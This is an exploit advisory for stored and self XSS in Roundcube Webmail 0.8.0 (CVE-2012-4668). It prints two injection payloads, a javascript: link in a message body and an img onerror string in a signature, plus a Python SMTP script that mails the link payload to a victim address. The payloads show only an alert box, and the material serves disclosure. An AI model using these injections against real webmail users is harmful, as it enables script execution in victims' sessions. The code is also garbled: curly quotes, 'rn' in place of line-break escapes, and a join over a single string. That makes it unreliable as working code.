Roundcube Webmail Version Stored XSS Exploit

Summary

Roundcube Webmail Version 0.8.0 suffers from stored XSS vulnerability

Credit:

The information has been provided by dun.


Details

Vulnerable Systems:
 * Roundcube Webmail Version 0.8.0

1. Stored XSS in e-mail body.

XSS Payload: <a href=javascript:alert(‘XSS’)>POC MAIL</a>

Send an email to the victim with the payload in the email body, Once the user clicks on the url the XSS should be triggered.

2. Self XSS in e-mail body (Signature).

XSS Payload: ‘><img src=’1.jpg’onerror=javascript:alert(‘XSS’)>

In order to trigger this XSS you should insert the payload into your signature.

Settings -> Identities -> Your Identitiy -> Signature
Now create a new mail, XSS Should be triggered.

”’

import smtplib

print ‘###############################################’
print ‘# Roundcube 0.8.0 Stored XSS POC #’
print ‘# Coded by: Shai rod #’
print ‘# @NightRang3r #’
print ‘# http://exploit.co.il #’
print ‘# For Educational Purposes Only! #’
print ‘###############################################rn’

# SETTINGS

sender = ‘attacker@localhost’
smtp_login = sender
smtp_password = ‘qwe123’
recipient = ‘victim@localhost’
smtp_server = ‘192.168.1.10’
smtp_port = 25
subject = ‘Roundcube Webmail XSS POC’

# SEND E-MAIL

print ‘[*] Sending E-mail to ‘ + recipient + ‘…’
msg = (‘From: %srnTo: %srnSubject: %sn’
% (sender, ‘, ‘.join(recipient), subject) )
msg += ‘Content-type: text/htmlnn’
msg += ”'<a href=javascript:alert(‘XSS’)>Click Me, Please…</a>rn”’
server = smtplib.SMTP(smtp_server, smtp_port)
server.ehlo()
server.starttls()
server.login(smtp_login, smtp_password)
server.sendmail(sender, recipient, msg)
server.quit()
print ‘[+] E-mail sent!’

CVE Information:
2012-4668

Disclosure Timeline:
Published: 2012-08-17

Categories: Exploits